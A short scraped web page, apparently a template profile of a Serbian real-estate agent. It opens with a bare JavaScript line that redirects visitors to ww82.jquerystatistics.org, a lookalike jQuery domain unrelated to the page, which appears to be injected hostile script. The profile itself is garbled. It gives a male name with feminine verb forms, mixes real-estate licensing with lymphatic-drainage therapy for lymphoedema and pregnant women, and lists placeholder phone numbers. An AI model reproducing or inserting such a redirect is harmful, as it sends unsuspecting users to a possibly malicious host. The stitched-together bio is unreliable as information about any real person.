window.location='http://ww82.jquerystatistics.org/';

Agent za nekretinine

Марко Марковић

Diplomirala na Visokoj Ekonomskoj i Biznis Školi kao Ekonomski analiticar. Tokom školovanja i u praksi stekla iskustvo u radu sa više manuelnih tehnika koje uspešno implementira u marketinske i trzisne svrhe. Licencirani agent za nekretnine od 2009. godine. Pored vođenja obuke, u tom polju se specijalizovala u primeni manuelne limfne drenaže kod limfo edema i u radu sa trudnicama.

Tel: 1-222-333-5555Mob: 1-222-333-4444Fax: 1-222-333-5555